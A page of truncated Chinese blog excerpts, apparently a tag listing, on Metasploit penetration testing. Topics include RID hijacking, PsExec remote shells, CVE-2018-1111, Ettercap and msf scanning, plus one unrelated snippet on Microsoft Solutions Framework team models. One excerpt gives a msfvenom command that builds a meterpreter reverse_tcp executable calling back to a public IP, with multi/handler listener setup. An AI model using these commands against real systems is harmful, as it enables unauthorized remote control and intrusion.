msf实现rid劫持 rid劫持原理: 每个帐户都有一个指定的RID来标识它.与域控制器不同,Windows工作站和服务器会将大部分数据存储在HKLM\SAM\SAM\Domains\Account\Users项中,这需要访问System权限.它将通过设置一个相对标识符(RID)来更改帐户属性,该标识符应由目标机器上的一个现有账户拥有.利用一些Windows本地用户管理完整性的缺陷,该模块将允许使用一个已知帐户凭证(如GUEST帐户)进行身份验证,并使用另一个现有帐户(如Administrato…
渗透测试数据库用来保存渗透测试过程中获取的各种数据,很多时候你重启了kali发现连接不上数据库了,其实就是因为这个服务没开 MSF所使用的数据库时postgresql root@kali:/# service postgresql start     开启postgresql数据库服务 root@kali:/# msfdb init     如果你的msf无法成功连接数据库可以尝试使用初始化命令 A database appears to be already configured, skipp…
PsExec PsExec是pstools工具组套件的一部分,确成为了渗透利器,下载地址:点击这里下载 连接shell 我的Windows Server 2012默认打开域网络防火墙的时候,是不能连接成功的,关闭了防火墙就成功了,在其他同版本系统上开启域防火墙的情况下成功了,所以判断域防火墙配置不一样.大家使用的时候要注意对方FireWall的配置. PsExec \\TARGET_ADDRESS -u USERNAME [-p PASSWORD] cmd.exe 如果不加-p选项就是交互式输入…
前言 这紧紧只是一篇纯技术分享.我们的程序在运行时需要连接多台目标机器,并拷贝目标机器上特定文件夹中的文件.为了方便访问,要在每台目标机器上建立一个特定用户,所以 PsExec 成了实现此功能的一个方案(虽然已经被弃用). PsExec 简介 PsExec工具包含在远程管理工具包 PsTools 中,可以从该地址获取. 开启 Admin$ 使用PsExec执行远程命令,需要开启 Admin$ 共享. net share 检查目标机器是否开启 Admin$ 共享 如果没有开启该共享,需要通过修改注…
msf中的开发模型 书中关于六个小组的人员的案例: MSF 组队模型 v. 3.1-http://bbs.51cto.com/thread-1171-1.html 微软解决方案框架 - MSF的团队模型-http://blog.csdn.net/xuwedo2003/article/details/4394168 SA系统分析员/系统分析师(system analyst) 牛贴 一个24岁SA的尴尬 -关于SA(系统分析员)-http://bbs.csdn.net/topics/147229?p…
0x01 漏洞概述 近日,红帽官方发布了安全更新,修复了编号为CVE-2018-1111的远程代码执行漏洞,攻击者可以通过伪造DHCP服务器发送响应包,攻击红帽系统,获取root权限并执行任意命令. 0x02 影响版本 Red Hat Enterprise Linux Server 6 Red Hat Enterprise Linux Server 7 CentOS 6 CentOS 7 0x03 漏洞详情 DHCP 是一个局域网的网络协议,主要用于内部网络动态IP地址分配.Red Hat提供的…
msf制作shell 1 .制作反弹shell-exe文件 执行命令 msfvenom -p windows/meterpreter/reverse_tcp LHOST=2x.94.50.153 LPORT=4433 -f exe -o 4433.exe LHOST为公网IP LPORT为反弹端口 4433.exe为生成文件 2.控制端启动msfconsole,获取监听 运行命令 msfconsle msf5 > use exploit/multi/handler msf5 exploit(mu…
在实现密码破解之前,介绍一下如何分析密码.分析密码的目的是,通过从目标系统.组织中收集信息来获得一个较小的密码字典.本节将介绍使用Ettercap工具或MSFCONSOLE来分析密码. 8.2.1 Ettercap工具 Ettercap是Linux下一个强大的欺骗工具,也适用于Windows.用户能够使用Ettercap工具快速地创建伪造的包,实现从网络适配器到应用软件各种级别的包,绑定监听数据到一个本地端口等.下面将介绍Ettercap工具的使用. 使用Ettercap分析密码的具体操作步骤如…
Kail Linux渗透测试教程之在Metasploit中扫描 在Metasploit中扫描 在Metasploit中,附带了大量的内置扫描器.使用这些扫描器可以搜索并获得来自一台计算机或一个完整网络的服务信息.本节将介绍使用Metasploit中的辅助模块实现扫描. [实例4-4]在Metasploit中,扫描目标主机.具体操作步骤如下所示: (1)启动MSF终端.执行命令如下所示: root@kali:~# msfconsole msf> (2)搜索所有可用的扫描模块.执行命令如下所示: m…
基础配置 由于kali 2.0 已经没有metasploit 这个服务了,所以service metasploit start 的方式不起作用. 在kali 2.0中启动带数据库支持的MSF方式如下: 1 首先启动postgresql数据库: /etc/init.d/postgresql start:或者 service postgresql start: 2 初始化MSF数据库(关键步骤!):msfdb init:(如不能初始化,就用msfdb reinit试试吧!默认创建的数据库名:msf,…